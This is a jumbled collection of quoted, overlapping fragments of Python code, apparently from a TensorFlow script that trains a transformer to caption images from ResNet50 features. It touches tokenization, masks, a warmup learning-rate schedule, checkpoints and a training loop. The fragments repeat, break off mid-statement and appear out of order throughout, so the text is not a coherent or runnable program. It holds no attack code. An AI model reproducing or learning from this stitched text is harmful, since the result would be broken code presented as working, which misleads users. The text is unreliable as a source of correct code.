demonstrated in earlier chapters # This is a quick", "an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:,", "GPU ## tf.keras.backend.clear_session() # - for easy reset of notebook state # chck", "= inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some 
prepared captions: \",", "Model # num_layers = 12 # d_model = 768 # dff = d_model", "inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a column", "training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half", "= inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to compute a", "Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on", "captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of", "images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if", "x = cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0] *", "Helper function for creating masks def create_masks(inp, tar): # Encoder padding mask -", "if gpus: # Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0],", "of the model # BERT (base) uses 12 layers, 768 as embedding dim,", "if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will", "end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end)", "plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000,", "Transformer Model ######################### # These parameters control the size and complexity of the", "the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical", "to compute a column with the new name of the saved image feature", "import json from glob import glob 
from PIL import Image import pickle import", "* int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized", "Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1)", "inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length of", "checkpoint restored!!') ######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE =", "= 64 # can reduce or increase depending on GPU capacity # Shuffle", "def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask =", "tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask,", "datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch", "# temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train", "beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot # import matplotlib.pyplot as", "= tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss')", "prepared.\") ######################### # Build Transformer Model ######################### # These parameters control the size", "cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model", "tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint. 
if", "memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the", "= 0.1 EPOCHS = 20 # should see results in 4-10 epochs also", "before GPUs have been initialized print(e) ############################################### ######################### # Load Data file mapping", "tfds demonstrated in earlier chapters # This is a quick way if data", "CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out if not training", "= 8 # BERT Base Model # num_layers = 12 # d_model =", "json from glob import glob from PIL import Image import pickle import re", "mask future tokens in the input received by # the decoder. look_ahead_mask =", "and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real,", "dataset prepared.\") ######################### # Build Transformer Model ######################### # These parameters control the", "verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### #", "BATCH_SIZE = 64 # can reduce or increase depending on GPU capacity #", "d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) #########################", "captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load the", "is important for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy", "print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices", "1) # for special tokens start = '<s>' end = '</s>' inputs['tokenized'] =", "tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with", "\"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a 
surfboard.\".lower())) print(\"Tokenizer hydrated\")", "heads # and 4H (4x768) as feedforward size # Small Model num_layers =", "4 # as per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size", "truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens start = '<s>'", "file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man", "return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### #", "the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8'))", "quick way if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) #", "# plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none')", "enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ =", "= tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ =", "def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32)", "control the size and complexity of the model # BERT (base) uses 12", "{} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(),", "x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training #########################", "print(e) ############################################### 
######################### # Load Data file mapping captions to images ######################### prefix", "be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage", "# We will set this as the max length of captions # which", "1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path", "len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length of captions #", "dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files in", "tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp, tar): #", "must be set before GPUs have been initialized print(e) ############################################### ######################### # Load", "= inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for", "num_heads = 8 # BERT Base Model # num_layers = 12 # d_model", "all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd", "end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x)", "/ tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function", "tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use the first GPU try:", "# Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt,", "train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask", "@tf.function def train_step(inp, tar): 
tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask,", "pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer", "# input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) #", "128 dff = d_model * 4 num_heads = 8 # BERT Base Model", "to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to", "restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training", "GPU\") except RuntimeError as e: # Visible devices must be set before GPUs", "CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model,", "Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result()))", "######################### # Build Transformer Model ######################### # These parameters control the size and", "as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model,", "input received by # the decoder. 
look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask", "Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0))", "prefix = './data/' save_prefix = prefix + \"features/\" # for storing prefixes annot", "time import datetime from tqdm import tqdm # our visual transformer code import", "tokenization # tfds demonstrated in earlier chapters # This is a quick way", "tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files in parallel dataset", "tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy", "# Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE =", "def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask,", "training on GPU ## ## this is important for running CuDNN on GPU", "enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables))", "# captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load", "to mask the encoder outputs. 
dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st", "reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask", "from glob import glob from PIL import Image import pickle import re import", "d_model = 768 # dff = d_model * 4 # as per BERT", "on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)", "inp -> images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp,", "inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet", "as pd from sklearn.model_selection import train_test_split import json from glob import glob from", "len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") #", "return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now", "rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning Rate Schedule, as", "devices must be set before GPUs have been initialized print(e) ############################################### ######################### #", "# tfds demonstrated in earlier chapters # This is a quick way if", "combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss)", "in earlier chapters # This is a quick way if data fits in", "TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU')", "tokenize_pad(x)) 
print(\"Captions tokenized and padded/truncated\") # now to compute a column with the", "prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data", "# dff = d_model * 4 # as per BERT paper # num_heads", "return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer,", "and complexity of the model # BERT (base) uses 12 layers, 768 as", "numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return", "d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 =", "ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format(", "######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of", "12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS", "of captions # which cover 99% of the captions without truncation max_len =", "This padding mask is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq)", "the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops", "0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1,", "with the new name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda", "set before GPUs have been initialized print(e) ############################################### ######################### # Load Data file", "decoder. 
# This padding mask is used to mask the encoder outputs. dec_padding_mask", "from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as np import", "Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True,", "dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp,", "num_layers = 12 # d_model = 768 # dff = d_model * 4", "ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path))", "is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__()", "file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### # Prepare", "# setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 # can reduce", "lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization #", "decoder. # It is used to pad and mask future tokens in the", "future tokens in the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1])", "inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization # tfds demonstrated", "if len(x) < max_len: x = x + [0] * int(max_len - len(x))", "save_prefix = prefix + \"features/\" # for storing prefixes annot = prefix +", "tokens in the input received by # the decoder. 
look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask", "Step\") ######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real,", "1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {}", "dff = d_model * 4 num_heads = 8 # BERT Base Model #", "names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file(", "surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by spaces lens =", "tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start", "\"features/\" # for storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot,", "######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE", "test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions # Load the numpy file", "optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm", "int(lens.quantile(0.99) + 1) # for special tokens start = '<s>' end = '</s>'", "for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset of", "lambda x: start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def", "tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for", "= tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) #", "easy reset of notebook state # chck if GPU can be seen by", "= 
np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to", "tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables)", "be 1's # input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0],", "pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup #########################", "reset of notebook state # chck if GPU can be seen by TF", "for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took", "= vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask", "Used in the 2nd attention block in the decoder. # This padding mask", "2nd attention block in the decoder. # This padding mask is used to", "create_masks(inp, tar): # Encoder padding mask - This should just be 1's #", "hydrated\") # Max length of captions split by spaces lens = inputs['caption'].map(lambda x:", "print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1,", "ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup training parameters", "padded/truncated\") # now to compute a column with the new name of the", "the schedule: uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule =", "# now to compute a column with the new name of the saved", "vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the decoder. 
# It", "= tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp, tar):", "Build Transformer Model ######################### # These parameters control the size and complexity of", "if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup", "Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU')", "######################### # Load Data file mapping captions to images ######################### prefix = './data/'", "tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if", "checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) #", "train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save()", "== 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch +", "if not training on GPU ## ## this is important for running CuDNN", "if (epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint", "BERT (base) uses 12 layers, 768 as embedding dim, 12 attention heads #", "self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step)", "batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch", "1's # input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]])", "pd from sklearn.model_selection 
import train_test_split import json from glob import glob from PIL", "cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files", "earlier chapters # This is a quick way if data fits in memory", "datetime from tqdm import tqdm # our visual transformer code import visual_transformer as", "the captions without truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens", "feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') ######################### #", "for storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\",", "dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy =", "the new name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x:", "optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to plot", "tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets", "as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment", "inputs.img_features.tolist() # we only took half validation examples so we dont need to", "as the max length of captions # which cover 99% of the captions", "load the numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature,", "= dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To", "4H (4x768) as feedforward size # Small Model num_layers = 4 d_model =", "x: start + x.lower().strip() + end) print(\"Some prepared captions: \", 
inputs.tokenized[:5]) def tokenize_pad(x):", "__init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps", "% 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at", "a column with the new name of the saved image feature file inputs['img_features']", "vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False )", "cap_train = img_names, captions # Load the numpy file with extracted ResNet50 feature", "and padded/truncated\") # now to compute a column with the new name of", "setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)", "Visualize the schedule: uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule", "start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start +", "of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by spaces", "= ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch", "*= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy')", "img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as np", "GPUs have been initialized print(e) ############################################### ######################### # Load Data file mapping captions", "# already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should", "captions # Load the numpy file with extracted ResNet50 feature def 
load_image_feature(img_name, cap):", "######################### # These parameters control the size and complexity of the model #", "Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path,", "not training on GPU ## ## this is important for running CuDNN on", "import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as", "latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### # Training Loops #########################", "train_step(inp, tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}]", "ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken", "chapters # This is a quick way if data fits in memory lens", "encoder outputs. 
dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block in", "# - for easy reset of notebook state # chck if GPU can", "captions after tokenization # tfds demonstrated in earlier chapters # This is a", "######################### # Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred):", "input shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all", "dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real,", "already includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should see", "pandas as pd from sklearn.model_selection import train_test_split import json from glob import glob", "return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the", "column with the new name of the saved image feature file inputs['img_features'] =", "# Perform one step of raining on one batch in an epoch @tf.function", "(inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts", "+ 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 == 0:", "length of captions # which cover 99% of the captions without truncation max_len", "glob import glob from PIL import Image import pickle import re import os", "= tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint.", "== 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f}", "visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please", "= d_model * 4 num_heads = 8 # BERT Base Model # num_layers", "tar): tar_inp = tar[:, :-1] tar_real = tar[:, 1:] 
enc_padding_mask, combined_mask, dec_padding_mask =", "file mapping captions to images ######################### prefix = './data/' save_prefix = prefix +", "FOR RTX 2070/NVidia GPU ############### ## Please comment out if not training on", "TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus", "numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2],", "0.1 EPOCHS = 20 # should see results in 4-10 epochs also transformer", "uses 12 layers, 768 as embedding dim, 12 attention heads # and 4H", "vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out", "BERT Base Model # num_layers = 12 # d_model = 768 # dff", "riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length", "captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x", "and mask future tokens in the input received by # the decoder. 
look_ahead_mask", "epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch", "tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)", "for creating masks def create_masks(inp, tar): # Encoder padding mask - This should", "to images ######################### prefix = './data/' save_prefix = prefix + \"features/\" # for", "= tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint exists,", "+ x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x =", "BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end", "validation examples so we dont need to split # img_train, img_val, cap_train, cap_val", "# plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and", "'</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared", "CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule: uncomment to", "Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step", "dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on", "to load the numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function(", "cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train 
